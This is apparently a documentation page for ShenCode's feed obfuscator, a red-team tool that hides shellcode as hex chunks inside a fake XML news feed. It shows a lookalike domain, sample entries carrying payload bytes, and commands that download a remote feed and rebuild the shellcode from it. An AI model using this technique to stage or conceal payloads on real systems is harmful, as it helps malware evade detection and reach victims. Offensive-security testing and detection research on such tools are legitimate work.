ShenCode - Feed - Heckhausen.IT

Feed Obfuscater

Description

With the feed obfuscater, the shellcode is split and disguised as a feed in an XML file. The code is appended to the article.id in chunks of 8 bytes each:

<entry>
<title type="html">prepay ship previous gumminess perpetual ranting cattishly pectin movie</title>
<link href="https://www.microloft.com/01/30/prepay%20ship%20previous%20gumminess%20perpetual%20ranting%20cattishly%20pectin%20movie" rel="alternate" type="text/html" title="prepay ship previous gumminess perpetual ranting cattishly pectin movie"/>
<published>2022-01-20 04:49</published>
<updated>2022-01-20 04:49</updated>
<id>https://www.microloft.com/554889e54883ec40</id>
</entry>
<entry>
<title type="html">afterlife utility essence</title>
<link href="https://www.microloft.com/02/10/afterlife%20utility%20essence" rel="alternate" type="text/html" title="afterlife utility essence"/>
<published>2024-01-03 05:34</published>
<updated>2024-01-03 05:34</updated>
<id>https://www.microloft.com/4831c0488945f848</id>
</entry>

The code can also be reassembled by passing the parameters --reassemble and --uri. The feed is then downloaded and processed accordingly.

Command

shencode obfuscate feed [-h] [-i INPUT] [-o OUTPUT] [-r] [-u URI]

options:
  -h, --help        show this help message and exit
  -i, --input       Input file for feed encoding
  -o, --output      Output file for feed encoding

additional:
  -r, --reassemble  Reassemble fake feed to Shellcode
  -u, --uri         URI to fake feed

Generate Fake Feed

shencode feed --input shellcode.raw --output feed.xml

Reassemble Shellcode from Fake Feed

shencode feed --output shellcode.raw --reassemble --uri https://www.site.com/feed.xml

Example

shencode feed -i calc.raw -o feed.xml

[FEED-OBF]-[2.2.0]

[*] Try to open file calc.raw
[+] File calc.raw loaded
[+] Size of shellcode 251 bytes
[+] Hash: 7c1bb19fe6606cfe29e750326db2972c4743e623
[*] Try to generate fake feed
[+] File feed.xml created
[+] Size 13169 bytes
[+] Hash: ffdaf7ed3baf44c19515fc1654008a6149d63613
[+] DONE!

JSON Parameter

Arguments	Values	Type
input	filename	str
ouput	filename	str
uri	URL	str
reassemble	true, false	bool